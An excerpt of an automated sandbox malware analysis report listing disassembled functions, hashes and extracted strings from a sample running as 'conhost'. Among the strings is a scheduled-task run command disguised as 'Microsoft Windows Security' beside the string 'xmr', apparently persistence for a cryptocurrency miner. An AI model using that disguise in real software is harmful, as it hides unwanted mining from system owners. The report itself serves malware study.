                                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF693C5DB12
                                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF693C5DAEA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$ProtectQuery
                                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                    • API String ID: 1027372294-1286557213
                                                                                                                    • Opcode ID: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                    • Instruction ID: f595ec6f7c817f82b4b7979448add7096c5ac49f0dbcabded887d07f03045707
                                                                                                                    • Opcode Fuzzy Hash: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                    • Instruction Fuzzy Hash: 9F91AA22F2CF42C5EA309B25940A67962B8EB457A8F5442B1DD1DEB7D8EE3CE481C740
                                                                                                                    Function 00007FF693C5D100 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: freememcpystrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2208669145-0
                                                                                                                    • Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                    • Instruction ID: a5981ad860101b0e94970291a8420e2969cdad1bb667a04502a80adc7909aad8
                                                                                                                    • Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                    • Instruction Fuzzy Hash: F331C472A2DF43C1FA765A116A0627A9678EF907E4F1442B0ED5DE6BD4DE3CE9818300
                                                                                                                    Function 00007FF693C66260 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Byte$CharLeadMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2561704868-0
                                                                                                                    • Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                    • Instruction ID: 113fb611b90943917ead34b5f9f5e65e56f2aadc2f33af0f5e6114e5c5b7f631
                                                                                                                    • Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                    • Instruction Fuzzy Hash: 5231A272A0CA82C6E3704B25A4013BD76A8FB90798F548175EA89E77D5CE3DE8958B00
                                                                                                                    Function 00007FF693C52D70 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpywcslen
                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$xmr
                                                                                                                    • API String ID: 225642448-2694755926
                                                                                                                    • Opcode ID: e721042315e0e046e0a7402927b45c50c4dd85cb7177564a663bb38941b94470
                                                                                                                    • Instruction ID: c9899bd01cbba48dbc44daf86cbb3d94dbc23cf68069fad4c1a691851a8b6da7
                                                                                                                    • Opcode Fuzzy Hash: e721042315e0e046e0a7402927b45c50c4dd85cb7177564a663bb38941b94470
                                                                                                                    • Instruction Fuzzy Hash: B831F022A0CA02C5EA309F11A4063BAB6F8FB493A4F844675EE5CE62D4EF7DE045C300
                                                                                                                    Function 00007FF693C533D0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcslen
                                                                                                                    • String ID: 0$@
                                                                                                                    • API String ID: 4088430540-1545510068
                                                                                                                    • Opcode ID: 7b0080f18a17ad6c6f57d59a81fed640772053f353e42e26bb4d0a8a42a80350
                                                                                                                    • Instruction ID: 94ab4a3dfa845974fba48e267dd4c9148d23e2792481631dde3d5f3bf7cfeaac
                                                                                                                    • Opcode Fuzzy Hash: 7b0080f18a17ad6c6f57d59a81fed640772053f353e42e26bb4d0a8a42a80350
                                                                                                                    • Instruction Fuzzy Hash: 75212A32618B8096E3219B65F44679BB6B4FBC4398F604235FB8887B59EF7DD0598B00
                                                                                                                    Function 00007FF693C58685 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: strlen
                                                                                                                    • String ID: this${parm#$}
                                                                                                                    • API String ID: 39653677-3278767634
                                                                                                                    • Opcode ID: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                    • Instruction ID: 265788fadf4a0d2d67bb4d9b882d5b756347eb6353dda17bbb6d40058d2f61c5
                                                                                                                    • Opcode Fuzzy Hash: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                    • Instruction Fuzzy Hash: 9121E777A4CA82C1E7369F25A4023FD2765EB05B98F488072CE4D9B789DF7DD4818321
                                                                                                                    Function 00007FF693C53580 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcslen
                                                                                                                    • String ID: 0$@
                                                                                                                    • API String ID: 4088430540-1545510068
                                                                                                                    • Opcode ID: 8b72e09fd98e78bb5d5bc29e7213b71cef2c56e5029c253212ebce06dd2a20b9
                                                                                                                    • Instruction ID: 0ae3da00577372b86e24c807b0665bba4e42c169b2b32731544932c5b7372507
                                                                                                                    • Opcode Fuzzy Hash: 8b72e09fd98e78bb5d5bc29e7213b71cef2c56e5029c253212ebce06dd2a20b9
                                                                                                                    • Instruction Fuzzy Hash: 43119D2261CB8192E7209B61F48639BA6B4EBC4358F501135FB8CC7B69EF7CC4468B00
                                                                                                                    Function 00007FF693C5D430 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-3474627141
                                                                                                                    • Opcode ID: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                    • Instruction ID: bec089c83807ad75b6fce29ec63f47d5003d268f14a8914bfd81c9c9d4739ab4
                                                                                                                    • Opcode Fuzzy Hash: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                    • Instruction Fuzzy Hash: 2F01A562909E85C1D6228F2CE8021FAB378FF9975AF145325EB8D76260DF29D553C700
                                                                                                                    Function 00007FF693C5D510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-2468659920
                                                                                                                    • Opcode ID: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                    • Instruction ID: 5bf5f71f095b570e5a03157bc87cf47a728197be15ccaa7b34a0b630ea4edc0f
                                                                                                                    • Opcode Fuzzy Hash: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                    • Instruction Fuzzy Hash: 09F06252919F45C1D221CF28A8011FBB378FF8D799F185326EB8D76565DF28D642C740
                                                                                                                    Function 00007FF693C5D500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-4283191376
                                                                                                                    • Opcode ID: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                    • Instruction ID: 303aa494fc0de25fe2479faac0b0ff2b535416077e185ff616f8c42ba6cb2097
                                                                                                                    • Opcode Fuzzy Hash: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                    • Instruction Fuzzy Hash: 66F0C212808F45C1D221CF28A8010FAB338FF8D789F285326EB8D76160DF28D643C300
                                                                                                                    Function 00007FF693C5D4D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-4064033741
                                                                                                                    • Opcode ID: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                    • Instruction ID: 6b3e9861dc10e0882ac715df02447ce542e088279291048f3db6578093f9da2d
                                                                                                                    • Opcode Fuzzy Hash: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                    • Instruction Fuzzy Hash: B6F06252909F45C1D2218F28A8011FAB378FF8D79DF185326EB8D76565DF28D642C740
                                                                                                                    Function 00007FF693C5D4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-4273532761
                                                                                                                    • Opcode ID: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                    • Instruction ID: 3217bf1fb5b7fe1a1a30c0f1518ea9dc19588c8687e7eb21a0c8c2a1d31916f1
                                                                                                                    • Opcode Fuzzy Hash: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                    • Instruction Fuzzy Hash: 20F06262919F45C1D2218F28A8011FAB378FF8D799F185326EB8D76565DF28D642C740
                                                                                                                    Function 00007FF693C5D4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-2187435201
                                                                                                                    • Opcode ID: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                    • Instruction ID: 835bb20ca6775180c7cfa3ec424b7b7f7d96a9e90630a9030e64fbf1a339f562
                                                                                                                    • Opcode Fuzzy Hash: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                    • Instruction Fuzzy Hash: DAF06252909F45C1D2218F28A8011FAB378FF8DB99F185326EB8D76565DF28D642C740
                                                                                                                    Function 00007FF693C5D461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                    • API String ID: 383729395-2713391170
                                                                                                                    • Opcode ID: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                    • Instruction ID: f07fa038fe986c8c40cc8eb84b5b39aa20d606e69450b79ba551cb4eb103d1ce
                                                                                                                    • Opcode Fuzzy Hash: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                    • Instruction Fuzzy Hash: 82F06212909F4581D2118F28A8011BAB374FF4D799F145326EF8976525DF28D5428740
                                                                                                                    Function 00007FF693C5DE50 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4020351045-0
                                                                                                                    • Opcode ID: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                    • Instruction ID: 0ec4eb6578b0bc87f99f99a31cf9809f8d604ece949d8cb96ad17069de3b86fc
                                                                                                                    • Opcode Fuzzy Hash: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                    • Instruction Fuzzy Hash: 6A11CC61F6DF03C6EA748B65A88617922B9EFA4B40B5454B5CD0EE6260DFBCF9418380

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B98ED40 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2782924460.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9b98d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
